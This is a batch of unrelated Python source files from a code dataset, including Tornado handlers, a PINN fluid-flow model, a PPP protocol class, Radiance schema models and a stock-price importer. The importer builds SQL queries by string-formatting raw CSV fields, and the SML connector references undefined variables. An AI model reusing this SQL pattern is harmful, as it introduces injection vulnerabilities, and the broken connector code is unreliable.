self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, CustomerServiceMetricTaskCollection):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"src/ebay_rest/api/sell_feed/models/customer_service_metric_task_collection.py","file_name":"customer_service_metric_task_collection.py","file_ext":"py","file_size_in_byte":11241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"636869580","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by mengqingyun on 14-5-22.\n\"\"\"\ncommon handler,webhandler,apihandler\n要获得torngas的中间件等特性需继承这些handler\n\"\"\"\nimport json\nimport tornado.locale\nfrom tornado.web import RequestHandler, HTTPError\nfrom logger.client import general_logger\nfrom torngas.settings_manager import settings\nfrom torngas.mixins.exception import UncaughtExceptionMixin\n\n\nclass CommonHandler(RequestHandler):\n _url_kwargs = {}\n\n def __init__(self, application, request, **kwargs):\n if kwargs:\n self._url_kwargs.update(kwargs)\n kwargs.clear()\n super(CommonHandler, self).__init__(application, request, **kwargs)\n\n def prepare(self):\n self.application.middleware_manager.run_request_hooks(self)\n return self.on_prepare()\n\n def on_prepare(self):\n pass\n\n def render_string(self, template_name, **kwargs):\n self.application.middleware_manager.run_render_hooks(self, template_name, **kwargs)\n return super(CommonHandler, self).render_string(template_name, **kwargs)\n\n def finish(self, chunk=None):\n # finish之前可能执行过多次write,反而chunk可能为None\n # 真正的chunk数据在self._write_buffer中,包含历次write的数据\n # 这里将chunk数据write进_write_buffer中,然后将chunk置空\n if chunk:\n self.write(chunk)\n chunk = None\n self.application.middleware_manager.run_response_hooks(self, self._write_buffer)\n super(CommonHandler, self).finish(chunk)\n\n def write(self, chunk, status=None):\n if status:\n self.set_status(status)\n super(CommonHandler, self).write(chunk)\n\n def log_exception(self, typ, value, tb):\n \"\"\"重写404请求的异常处理\n \"\"\"\n if isinstance(value, HTTPError):\n if value.log_message:\n format = \"%d %s: \" + value.log_message\n args = ([value.status_code, self._request_summary()] +\n list(value.args))\n general_logger.warning(format, *args)\n else:\n general_logger.error(\"Uncaught exception %s\\n%r\", self._request_summary(),\n self.request, exc_info=(typ, value, tb))\n\n def on_finish(self):\n 
self.application.middleware_manager.run_endcall_hooks(self)\n self.complete_finish()\n\n def complete_finish(self):\n pass\n\n def get_user_locale(self):\n if settings.TRANSLATIONS_CONF.use_accept_language:\n return None\n\n return tornado.locale.get(settings.TRANSLATIONS_CONF.locale_default)\n\n\nclass WebHandler(UncaughtExceptionMixin, CommonHandler):\n def create_template_loader(self, template_path):\n loader = self.application.tmpl\n if loader is None:\n return super(CommonHandler, self).create_template_loader(template_path)\n else:\n return loader(template_path)\n\n\nclass ApiHandler(CommonHandler):\n def get_format(self):\n format = self.get_argument('format', None)\n if not format:\n accept = self.request.headers.get('Accept')\n if accept:\n if 'javascript' in accept:\n format = 'jsonp'\n else:\n format = 'json'\n return format or 'json'\n\n def write_api(self, obj=None, nofail=False):\n if not obj:\n obj = {}\n format = self.get_format()\n if format == 'json':\n self.set_header(\"Content-Type\", \"application/json; charset=UTF-8\")\n self.write(json.dumps(obj))\n elif format == 'jsonp':\n self.set_header(\"Content-Type\", \"application/javascript\")\n callback = self.get_argument('callback', 'callback')\n self.write('%s(%s);' % (callback, json.dumps(obj)))\n elif nofail:\n self.write(json.dumps(obj))\n else:\n raise HTTPError(400, 'Unknown response format requested: %s' % format)\n\n\nclass ErrorHandler(UncaughtExceptionMixin, CommonHandler):\n def prepare(self):\n super(ErrorHandler, self).prepare()\n self.set_status(404)\n raise HTTPError(404)","sub_path":"torngas/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"71843687","text":"import plot\nimport simulation\nimport json\nimport os\n\n\ndef simulations(directory):\n\n\thistories = []\n\tgraphs = []\n\tfail = []\n\n\tenv = json.loads(open(\"presets/{}.json\".format(directory), \"r\").read())\n\n\tfor i in range(10):\n\t\th, g, failures = simulation.simulate(env)\n\t\thistories.append(h)\n\t\tgraphs.append(g)\n\t\tfail.append(failures)\n\n\tif not os.path.exists(\"plots/{}\".format(directory)):\n\t\tos.mkdir(\"plots/{}\".format(directory))\n\tplot.plot_multiple_histories(histories, directory)\n\tplot.plot_wealth_distribution(graphs, directory)\n\tplot.plot_wealth_distribution_in(graphs, directory)\n\n\tplot.plot_path_length(graphs[0], directory)\n\n\tundirected = []\n\n\tfor gs in graphs:\n\t\tundirected.append(gs.to_undirected())\n\n\tplot.plot_robustness_random(undirected, 10, directory)\n\tplot.plot_robustness_coordinated(undirected, 7, directory)\n\n\tprint(fail)\n\n\nif __name__ == \"__main__\":\n\tsimulations(\"wealth_paste\")\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"124977854","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\nclass LinearBlock(nn.Module):\n\n def __init__(self, in_nodes, out_nodes):\n super(LinearBlock, self).__init__()\n self.layer = nn.utils.weight_norm(nn.Linear(in_nodes, out_nodes), dim = 0)\n\n def forward(self, x):\n x = self.layer(x)\n x = x * torch.sigmoid(x) # SiLU\n return x\n\nclass PINN(nn.Module):\n\n def __init__(self, data, layer_list):\n super(PINN, self).__init__()\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.input_layer = 
nn.utils.weight_norm(nn.Linear(layer_list[0], layer_list[1]), dim = 0)\n self.hidden_layers = self._make_layer(layer_list[1:-1])\n self.output_layer = nn.utils.weight_norm(nn.Linear(layer_list[-2], layer_list[-1]), dim = 0)\n self.data = data\n self.mean = self.data.mean(dim=0).to(device)\n self.sig = torch.sqrt(self.data.var(dim=0)).to(device)\n\n def _make_layer(self, layer_list):\n layers = []\n for i in range(len(layer_list) - 1):\n block = LinearBlock(layer_list[i], layer_list[i + 1])\n layers.append(block)\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = (x - self.mean) / self.sig\n x = self.input_layer(x)\n x = x * torch.sigmoid(x)\n x = self.hidden_layers(x)\n x = self.output_layer(x)\n return x\n\ndef weights_init(m):\n if isinstance(m, nn.Linear):\n torch.nn.init.xavier_normal_(m.weight)\n\ndef pinn(data, layer_list):\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n model = PINN(data, layer_list).to(device)\n model.apply(weights_init)\n print(\"Operation mode: \", device)\n return model\n\ndef fwd_gradients(obj, x):\n dummy = torch.ones_like(obj)\n derivative = torch.autograd.grad(obj, x, dummy, create_graph= True)[0]\n return derivative\n\ndef Navier_Stokes_2D(c, u, v, p, txy, Pec, Rey):\n c_txy = fwd_gradients(c, txy)\n u_txy = fwd_gradients(u, txy)\n v_txy = fwd_gradients(v, txy)\n p_txy = fwd_gradients(p, txy)\n\n c_t = c_txy[:, 0:1]\n c_x = c_txy[:, 1:2]\n c_y = c_txy[:, 2:3]\n u_t = u_txy[:, 0:1]\n u_x = u_txy[:, 1:2]\n u_y = u_txy[:, 2:3]\n v_t = v_txy[:, 0:1]\n v_x = v_txy[:, 1:2]\n v_y = v_txy[:, 2:3]\n p_x = p_txy[:, 1:2]\n p_y = p_txy[:, 2:3]\n\n c_xx = fwd_gradients(c_x, txy)[:, 1:2]\n c_yy = fwd_gradients(c_y, txy)[:, 2:3]\n u_xx = fwd_gradients(u_x, txy)[:, 1:2]\n u_yy = fwd_gradients(u_y, txy)[:, 2:3]\n v_xx = fwd_gradients(v_x, txy)[:, 1:2]\n v_yy = fwd_gradients(v_y, txy)[:, 2:3]\n\n e1 = c_t + (u * c_x + v * c_y) - (1.0 / Pec) * (c_xx + c_yy)\n e2 = u_t + (u * u_x + v * u_y) + p_x - (1.0 / Rey) * (u_xx + u_yy)\n e3 = v_t + (u * v_x + v * v_y) + p_y - (1.0 / Rey) * (v_xx + v_yy)\n e4 = u_x + v_y\n\n return e1, e2, e3, e4\n\ndef Gradient_Velocity_2D(u, v, txy):\n u_txy = fwd_gradients(u, txy)\n v_txy = fwd_gradients(v, txy)\n\n u_x = u_txy[:, 1:2]\n u_y = u_txy[:, 2:3]\n v_x = v_txy[:, 1:2]\n v_y = v_txy[:, 2:3]\n\n return u_x, v_x, u_y, v_y\n\ndef test_data(T_star, X_star, Y_star, C_star, U_star, V_star, P_star):\n snap = np.random.randint(0, 200)\n t_star = T_star[:, snap:snap+1]\n x_star = X_star[:, snap:snap+1]\n y_star = Y_star[:, snap:snap+1]\n c_star = C_star[:, snap:snap+1]\n u_star = U_star[:, snap:snap+1]\n v_star = V_star[:, snap:snap+1]\n p_star = P_star[:, snap:snap+1]\n\n variables_star = torch.FloatTensor(np.concatenate((t_star, x_star, y_star), 1)) # N x 3\n target_star = torch.FloatTensor(np.concatenate((c_star, u_star, v_star, p_star), 1)) # N x 4\n\n return variables_star, target_star\n\ndef relative_error(pred, target):\n return torch.sqrt(torch.mean((pred - target)**2)/torch.mean((target - torch.mean(target))**2)).cpu().numpy()\n\nif __name__ == \"__main__\":\n import numpy as np\n dummy_data = torch.Tensor(np.random.normal(0,1,size=(100,3)))\n layer_list = [3] + 10*[200] + [4]\n model = pinn(dummy_data, layer_list)\n print(model)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"149792675","text":"#coding:utf-8\n\nimport db_config\nfrom functions import 
exchange_code\nimport logging\nimport datetime\nimport csv\nimport mysql.connector\nimport sys\nimport slackweb\nimport configparser\n\n\nBASE_DIR = '/usr/local/script/'\naccount = BASE_DIR + 'config/account.ini'\naccount_config = configparser.ConfigParser()\naccount_config.read(account, 'UTF-8')\n\npath = BASE_DIR + 'config/path.ini'\npath_config = configparser.ConfigParser()\npath_config.read(path, 'UTF-8')\n\n# Constants\nDB_USER = account_config.get('db', 'DB_USER')\nDB_PASSWORD = account_config.get('db', 'DB_PASSWORD')\nDB_HOST = account_config.get('db', 'DB_HOST')\nDB_DATABASE = account_config.get('db', 'DB_DATABASE')\nTABLE = 'japan_all_stock_prices'\nCSV_FILE_DIR = path_config.get('csv_path', 'data_base') + path_config.get('csv_path', 'japan_all_stock_prices')\n\nargs = sys.argv\n\nif __name__ == '__main__':\n # モジュール名でロガーを生成する(メインモジュールは 名前が '__main__' になる)\n log = logging.getLogger(__name__)\n # Slack Incoming webhook設定\n slack_log_url = account_config.get('slack', 'slack_log_url')\n slack = slackweb.Slack(url=slack_log_url)\n\n log.info('日本株全銘柄テーブルインポート処理 : 開始')\n\n # 対象の日付を設定(引数でYYYYMMDD形式で日付を入れるとその日付のファイルを対象とする)\n if len(args) < 2:\n TODAY = datetime.date.today()\n else:\n TARGET_DAY = args[1]\n TODAY = datetime.datetime(int(TARGET_DAY[:4]), int(TARGET_DAY[4:6]), int(TARGET_DAY[-2:]))\n\n # Target File Name\n file_name_date_part = str(TODAY.year) + '{:0=2}'.format(TODAY.month) + '{:0=2}'.format(TODAY.day)\n file_name = 'japan-all-stock-prices_' + file_name_date_part + '.csv'\n\n log.info('テーブル名:%s 対象ファイル:%s' % (TABLE, file_name))\n\n with open (CSV_FILE_DIR + file_name) as csvfile:\n reader = csv.reader(csvfile)\n # headerと日経225、TOPIXをスキップする\n for i in range(3):\n next(reader, None)\n\n # MariaDB connect\n try:\n conn = mysql.connector.connect(user=DB_USER, password=DB_PASSWORD, host=DB_HOST, database=DB_DATABASE)\n cursor = conn.cursor()\n\n for row in reader:\n security_code = row[0] if row[0] != '-' else 'null'\n dt = file_name_date_part\n company_name = row[1] if row[1] != '-' else 'null'\n stock_exchange_code = exchange_code.get_stock_exchange_code(row[2])\n industry_type = exchange_code.get_industry_type(row[3])\n opening_price = row[9] if row[9] != '-' else 'null'\n closing_price = row[5] if row[5] != '-' else 'null'\n high_price = row[10] if row[10] != '-' else 'null'\n low_price = row[11] if row[11] != '-' else 'null'\n day_before_ratio = row[6] if row[6] != '-' else 'null'\n day_before_ratio_percentage = row[7] if row[7] != '-' else 'null'\n last_day_closing_price = row[8] if row[8] != '-' else 'null'\n volume = row[12] if row[12] != '-' else 'null'\n trading_value = row[13] if row[13] != '-' else 'null'\n market_capitalization = row[14] if row[14] != '-' else 'null'\n price_range_lower_limit = row[15] if row[15] != '-' else'null'\n price_range_upper_limit = row[16] if row[16] != '-' else 'null'\n cursor.execute('''INSERT INTO %s.%s (security_code, dt, company_name,\n stock_exchange_code, industry_type, opening_price, closing_price, high_price, low_price,\n day_before_ratio, day_before_ratio_percentage, last_day_closing_price, volume,\n trading_value, market_capitalization, price_range_lower_limit, price_range_upper_limit)\n VALUES(%s, '%s', \"%s\", %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\n ''' % (DB_DATABASE, TABLE, security_code, dt, company_name, stock_exchange_code, industry_type, opening_price,\n closing_price, high_price, low_price, day_before_ratio, day_before_ratio_percentage,\n last_day_closing_price, volume, trading_value, 
market_capitalization,\n price_range_lower_limit, price_range_upper_limit))\n except mysql.connector.Error as e:\n log.error(e)\n conn.close()\n\n conn.commit()\n conn.close()\n\n # テーブルINSERT件数確認\n try:\n conn = mysql.connector.connect(user=DB_USER, password=DB_PASSWORD, host=DB_HOST, database=DB_DATABASE)\n cursor = conn.cursor()\n count_query = \"\"\"SELECT dt, COUNT(*) FROM %s.%s WHERE dt = '%s' GROUP BY dt\"\"\" % (DB_DATABASE, TABLE, TODAY)\n cursor.execute(count_query)\n result = cursor.fetchone()\n result_word = \"処理日時:%s 取得件数:%s\" % (result[0], result[1])\n slack.notify(text=\"日本株全銘柄テーブルインポート\\n\" + result_word)\n except mysql.connector.Error as e:\n log.error(e)\n conn.close()\n\n log.info('日本株全銘柄テーブルインポート処理 : 終了')\n conn.close()\n","sub_path":"script/db/import_japan_all_stock_prices.py","file_name":"import_japan_all_stock_prices.py","file_ext":"py","file_size_in_byte":5393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"112401307","text":"import pandas as pd\r\nimport os\r\nimport re\r\n\r\nbusinesspath = \"C:/Users/David/YELP_PROJECT/datasets/yelp_academic_dataset_business_cleaned.csv\"\r\nbusinessdf = pd.read_csv(businesspath, error_bad_lines=False, encoding = \"ISO-8859-1\").fillna(value='NA')\r\n\r\ninpath = \"C:/Users/David/YELP_PROJECT/datasets/review_groups/\"\r\n#all_topics = pd.DataFrame(columns=('business_id', '1-2_Stars topic','4-5_Stars topic'))\r\ndata_list = []\r\nfor file in os.listdir(inpath):\r\n file_df = pd.read_csv(inpath+file, error_bad_lines=False, encoding = \"ISO-8859-1\").fillna(value='NA')\r\n file_df = file_df.drop('1-2_Stars', 1).drop('4-5_Stars', 1).drop('1-2_Stars_count', 1).drop('4-5_Stars_count', 1)\r\n data_list.append(file_df)\r\nall_topics = pd.concat(data_list)\r\n# all_topics.columns = (['1-2_star_topics','del1','4-5_star_topics','del2','business_id'])\r\n# all_topics = all_topics.drop('del1',1).drop('del2',1)\r\npath2 = \"C:/Users/David/YELP_PROJECT/datasets/experimental_concat.csv\"\r\npath3 = \"C:/Users/David/YELP_PROJECT/datasets/experimental_business.csv\"\r\nall_topics.to_csv(path2)\r\nnewdf = pd.merge(businessdf, all_topics, on='business_id')\r\nnewdf.to_csv(path3)\r\n#print(newdf)","sub_path":"capstone_project/experimental_WIP/review_topics_to_business_table.py","file_name":"review_topics_to_business_table.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"620650203","text":"from unittest import TestCase\n\nimport conwaysgameoflife\n\n\nclass TestPatternCanvas(TestCase):\n def test_init_with_glider(self):\n \"\"\"Test if a PatternCanvas can be initialised that it contains a glider.\n\n See:\n https://en.wikipedia.org/wiki/Glider_(Conway%27s_Life)\n for detailed description of this figure.\n \"\"\"\n\n test_pattern_canvas = conwaysgameoflife.PatternCanvas(\"glider\")\n\n self.assertEqual(test_pattern_canvas.pattern, [\n [0, 1, 0],\n [0, 0, 1],\n [1, 1, 1]\n ])\n\n def test_init_with_blinker(self):\n \"\"\"Test if a PatternCanvas can be initialised that it contains a blinker.\n\n See:\n https://en.wikipedia.org/wiki/Conway's_Game_of_Life#Examples_of_patterns\n for detailed description of this figure.\n \"\"\"\n\n test_pattern_canvas = conwaysgameoflife.PatternCanvas(\"blinker\")\n\n self.assertEqual(test_pattern_canvas.pattern, [\n [0, 1, 0],\n [0, 1, 0],\n [0, 1, 0]\n ])\n\n # def test_rotation_to_the_right(self):\n # \"\"\"Test if a PatternCanvas can be rotated.\n #\n # To the 
right in this case.\n #\n # First just test if the method exists and rotates a single alive cell.\n # \"\"\"\n #\n # test_pattern_canvas = conwaysgameoflife.PatternCanvas(None, None, \"single_cell\")\n # test_pattern_canvas.alive_cells = [[0]]\n #\n # test_pattern_canvas.rotate_right()\n #\n # self.assertEqual(test_pattern_canvas.alive_cells, [[0]])\n","sub_path":"test/test_patternCanvas.py","file_name":"test_patternCanvas.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"152127987","text":"# module load\nimport pandas as pd\nfrom module.norm import normalization\nfrom module.model import mlplinear\nfrom module import visual\n\n# data load\ndataset = pd.read_csv(\"./datas/dataset2.csv\") \n\n# normalization data for MLP layers\nnorm_dataset = normalization(dataset)\ndataset = norm_dataset.forward()\n\n# Split data 8:2\ntrain_data = dataset.sample(frac=0.8, random_state=0)\ntest_data = dataset.drop(train_data.index)\n\n# pop y data\ny_train_data = train_data.pop(\"avgPrice\")\ny_test_data = test_data.pop(\"avgPrice\")\n\n# build mlp model\ndim = len(train_data.columns) \nmlplinear = mlplinear(dim=dim, learning_rate=0.000005, epochs=10000, x_data=train_data, y_data=y_train_data, batch_size=8)\n'''\nmlplinear package need \nx dimention , learning rate, epochs, x_data, y_data, batch_size, validation split rate\n'''\n\nmodel = mlplinear.build() #.build() build MLP linear layers\nhistory = mlplinear.prediction(model) # predition need layers data\nhistory.model.save('./datas/my_model.h5')\n\n# evaluate \nloss, mae, mse = history.model.evaluate(test_data, y_test_data, verbose=2)\nmae = norm_dataset.y_backward(mae)\nprint(\"테스트 세트의 평균 절대 오차: {:5.2f} Price\".format(mse))\n\n# log data save .csv format\nhist = pd.DataFrame(history.history) \nhist['epoch'] = history.epoch\nhist.to_csv(\"./datas/log_data.csv\",index=False)\n\n# log data visualization\nlog_data = pd.read_csv(\"./datas/log_data.csv\") \nvisual.plot_history(log_data) # plot_history need only log dataframe, MAE, MSE plot\n\n# test prediction visualization\ntest_predictions = model.predict(test_data).flatten()\nvisual.plot_error(test_predictions, y_test_data) # plot_error(predict y, real y) plot True vs Predictions, prediction - real data\n","sub_path":"Green-Onion-price-reg/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"423182324","text":"import logging\nfrom struct import pack\nfrom zope.interface import implements\nfrom twisted.internet.protocol import ProcessProtocol\nfrom twisted.internet import reactor, interfaces\n\nfrom constants import VERBOSE\nfrom fcs import pppfcs16\nfrom utils import hexdump\n\n\nFLAG_SEQUENCE = b'\\x7e'\nCONTROL_ESCAPE = b'\\x7d'\n\nclass PPPDProtocol(ProcessProtocol):\n implements(interfaces.IPushProducer)\n\n frameBuffer = bytearray()\n paused = False\n\n def writeFrame(self, frame):\n fcs = pppfcs16(frame)\n buffer = bytearray(FLAG_SEQUENCE)\n for byte in frame:\n if ord(byte) < 0x20 or byte in (FLAG_SEQUENCE, CONTROL_ESCAPE):\n buffer.append(CONTROL_ESCAPE)\n buffer.append(ord(byte) ^ 0x20)\n else:\n buffer.append(byte)\n\n buffer.extend(pack('!H', fcs))\n buffer.append(FLAG_SEQUENCE)\n self.transport.write(str(buffer))\n\n\n def outReceived(self, data):\n logging.log(VERBOSE, \"Raw data: %s\", hexdump(data))\n escaped = False\n for byte in data:\n if escaped:\n escaped = False\n 
self.frameBuffer.append(ord(byte) ^ 0x20)\n elif byte == CONTROL_ESCAPE:\n escaped = True\n elif byte == FLAG_SEQUENCE:\n if not self.frameBuffer:\n continue\n if len(self.frameBuffer) < 4:\n logging.warning(\"Invalid PPP frame received from pppd. (%s)\",\n hexdump(self.frameBuffer))\n elif self.frameBuffer:\n del self.frameBuffer[-2:] # Remove FCS field\n self.pppFrameReceived(self.frameBuffer)\n self.frameBuffer = bytearray()\n else:\n self.frameBuffer.append(byte)\n\n\n def pppFrameReceived(self, frame):\n if self.paused:\n logging.debug('Drop a PPP frame.')\n return\n\n if frame.startswith('\\xff\\x03'):\n protocol = frame[2:4]\n else:\n protocol = frame[:2]\n\n if protocol[0] in (0x80, 0x82, 0xc0, 0xc2, 0xc4):\n self.sstp.writePPPControlFrame(frame)\n else:\n self.sstp.writePPPDataFrame(frame)\n\n\n def errReceived(self, data):\n logging.warn('Received errors from pppd.')\n logging.warn(data)\n\n\n def outConnectionLost(self):\n logging.debug('pppd stdout lost.')\n self.sstp.transport.loseConnection()\n\n\n def processEnded(self, reason):\n logging.info('pppd stopped.')\n self.sstp.pppStoped()\n\n\n def stopProducing(self):\n self.paused = True\n self.transport.loseConnection()\n\n\n def pauseProducing(self):\n logging.debug('Pause producting')\n self.paused = True\n\n\n def resumeProducing(self):\n logging.debug('Resume producing')\n self.paused = False\n\n","sub_path":"sstpd/ppp.py","file_name":"ppp.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"341581856","text":"import argparse\nimport sys_path\nsys_path.insert_sys_path()\nfrom report.lib_delta_report.phocr_mem_peak_reporter import PHOcrMemoryPeakReporter\n\n\ndef parse_argument():\n parser = argparse.ArgumentParser(\n description='Run test to check memory peak for all nominated test case.')\n parser.add_argument('-t', '--test-folder', required=True,\n help='Folder contain test set')\n parser.add_argument('-r', '--test-file', required=True,\n help=\"Test result file which is generated from run_all.py\")\n parser.add_argument('-c', '--combined-file', required=True,\n help=\"Combine result file which is generated from \"\n \"combine_all_mem_peak.py\")\n\n return parser.parse_args()\n\n\ndef main():\n args = parse_argument()\n\n memory_peak_reporter = PHOcrMemoryPeakReporter(test_folder=args.test_folder,\n test_file=args.test_file,\n combine_file=args.combined_file)\n memory_peak_reporter.do_work()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Run_PHocr_test/Mekong/utilities/utilities/report/report_mem_peak_infomation.py","file_name":"report_mem_peak_infomation.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"45522638","text":"\"\"\"SensorGrid and Sensor Schema\"\"\"\nfrom pydantic import Field, constr, validator\nfrom typing import List\nfrom enum import Enum\nfrom ..geometry import Mesh3D\nfrom .._base import NoExtraBaseModel\nfrom ._base import IDdRadianceBaseModel\n\nimport re\n\n\nclass _RadianceAsset(IDdRadianceBaseModel):\n \"\"\"Hidden base class for all Radiance Assets.\"\"\"\n\n display_name: str = Field(\n default=None,\n description='Text string for a unique display name, used to set the default '\n 'file name that the radiance asset is written to within a radiance folder. 
'\n 'Must not contain spaces or special characters.'\n )\n\n @validator('display_name')\n def valid_rad_string_display_name(cls, value):\n \"\"\"Check that a string is valid for Radiance.\n\n This method is modified from the honeybee-core.typing.valid_rad_string method.\n \"\"\"\n if value is not None:\n try:\n illegal_match = re.search(r'[^.A-Za-z0-9_-]', value)\n except TypeError:\n raise TypeError('display_name must be a text string. Got {}: {}.'.format(\n type(value), value))\n assert illegal_match is None, \\\n 'Illegal character \"{}\" found in display_name'.format(illegal_match.group(0))\n assert len(value) > 0, \\\n 'Input display_name \"{}\" contains no characters.'.format(value)\n return value\n\n room_identifier: str = Field(\n None,\n regex=r'[A-Za-z0-9_-]',\n min_length=1,\n max_length=100,\n description='Optional text string for the Room identifier to which this '\n 'object belongs. This will be used to narrow down the number of '\n 'aperture groups that have to be run with this sensor grid. If None, '\n 'the grid will be run with all aperture groups in the model.'\n )\n\n light_path: List[List[str]] = Field(\n None,\n description='Get or set a list of lists for the light path from the object to '\n 'the sky. Each sub-list contains identifiers of aperture groups through which '\n 'light passes. (eg. [[\"SouthWindow1\"], [\"static_apertures\", \"NorthWindow2\"]]).'\n 'Setting this property will override any auto-calculation of the light '\n 'path from the model and room_identifier upon export to the simulation.'\n )\n\n\nclass Sensor(NoExtraBaseModel):\n \"\"\"A single Radiance of sensors.\"\"\"\n\n type: constr(regex='^Sensor$') = 'Sensor'\n\n pos: List[float] = Field(\n ...,\n description=\"Position of sensor in space as an array of (x, y, z) values.\",\n min_items=3,\n max_items=3\n )\n\n dir: List[float] = Field(\n ...,\n description=\"Direction of sensor as an array of (x, y, z) values.\",\n min_items=3,\n max_items=3\n )\n\n\nclass SensorGrid(_RadianceAsset):\n \"\"\"A grid of sensors.\"\"\"\n\n type: constr(regex='^SensorGrid$') = 'SensorGrid'\n\n sensors: List[Sensor] = Field(\n ...,\n description='A list of sensors that belong to the grid.'\n )\n\n mesh: Mesh3D = Field(\n None,\n description='An optional Mesh3D that aligns with the sensors and can be '\n 'used for visualization of the grid. 
Note that the number of sensors in '\n 'the grid must match the number of faces or the number vertices within '\n 'the Mesh3D.'\n )\n\n\nclass ViewType(str, Enum):\n \"\"\"A single character for the view type (-vt).\"\"\"\n perspective = 'v'\n hemispherical_fisheye = 'h'\n parallel = 'l'\n cylindrical_panorama = 'c'\n angular_fisheye = 'a'\n planisphere = 's'\n\n\nclass View(_RadianceAsset):\n \"\"\"A single Radiance of sensors.\"\"\"\n\n type: constr(regex='^View$') = 'View'\n\n position: List[float] = Field(\n ...,\n description='The view position (-vp) as an array of (x, y, z) values.'\n 'This is the focal point of a perspective view or the center of a '\n 'parallel projection.',\n min_items=3,\n max_items=3\n )\n\n direction: List[float] = Field(\n ...,\n description='The view direction (-vd) as an array of (x, y, z) values.'\n 'The length of this vector indicates the focal distance as needed by '\n 'the pixel depth of field (-pd) in rpict.',\n min_items=3,\n max_items=3\n )\n\n up_vector: List[float] = Field(\n ...,\n description='The view up (-vu) vector as an array of (x, y, z) values.',\n min_items=3,\n max_items=3\n )\n\n view_type: ViewType = ViewType.perspective\n\n h_size: float = Field(\n 60,\n description='A number for the horizontal field of view in degrees (for '\n 'all perspective projections including fisheye). For a parallel '\n 'projection, this is the view width in world coordinates.'\n )\n\n v_size: float = Field(\n 60,\n description='A number for the vertical field of view in degrees (for '\n 'all perspective projections including fisheye). For a parallel '\n 'projection, this is the view width in world coordinates.'\n )\n\n shift: float = Field(\n None,\n description='The view shift (-vs). This is the amount the actual '\n 'image will be shifted to the right of the specified view. This '\n 'option is useful for generating skewed perspectives or rendering '\n 'an image a piece at a time. A value of 1 means that the rendered '\n 'image starts just to the right of the normal view. A value of -1 '\n 'would be to the left. Larger or fractional values are permitted '\n 'as well.'\n )\n\n lift: float = Field(\n None,\n description='The view lift (-vl). This is the amount the actual '\n 'image will be lifted up from the specified view. This '\n 'option is useful for generating skewed perspectives or rendering '\n 'an image a piece at a time. A value of 1 means that the rendered '\n 'image starts just to the right of the normal view. A value of -1 '\n 'would be to the left. Larger or fractional values are permitted '\n 'as well.'\n )\n\n fore_clip: float = Field(\n None,\n description='View fore clip (-vo) at a distance from the view point.'\n 'The plane will be perpendicular to the view direction for perspective '\n 'and parallel view types. For fisheye view types, the clipping plane is '\n 'actually a clipping sphere, centered on the view point with fore_clip radius. '\n 'Objects in front of this imaginary surface will not be visible.'\n )\n\n aft_clip: float = Field(\n None,\n description='View aft clip (-va) at a distance from the view point.'\n 'Like the view fore plane, it will be perpendicular to the view '\n 'direction for perspective and parallel view types. 
For fisheye '\n 'view types, the clipping plane is actually a clipping sphere, '\n 'centered on the view point with radius val.'\n )\n","sub_path":"honeybee_schema/radiance/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":6946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"152549489","text":"\"\"\"\nProcesses input after it has been parsed. Performs the dataflow for input.\n\"\"\"\nimport numpy as np\n\nfrom .summaries import *\nfrom .util import *\nfrom .model_building import build_model\nfrom .model_application import apply_model\nfrom .model_evaluation import evaluate_model\nfrom .data_processing import process_data\n\ndef handle(parsing, verbose, web=False):\n\n '''\n :parsing - Parsed pyparsing object\n :verbose - boolean variable used to control type of messaged displayed to console\n Main Function that handles model phase, apply phase, and metric phase of SML\n '''\n keywords = keyword_check(parsing)\n\n df, data_train, data_test = process_data(keywords,verbose)\n model, algoType, summary_msg = build_model(keywords, data_train ,verbose)\n\n if df is None and model is None:\n print(\"Please either READ in data or select a Model to build\")\n return None\n\n\n if model is not None: # If model isn't created no need to run through apply phase\n apply_result = apply_model(keywords, model, data_test)\n return apply_result\n else:\n apply_result = None\n\n if keywords.get('plot'): # for now plot is the only thing that needs to be specified\n metric_result = evaluate_model(keywords, model, algoType, df, X_train, y_train, X_test, y_test, web)\n else:\n metric_result = None\n\n if web:\n return {'model_summary': summary_msg, 'apply_summary': apply_result, 'metric_summary': metric_result}\n","sub_path":"sml/connector/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533486229","text":"import unittest, TxtMark.TxtMarker, 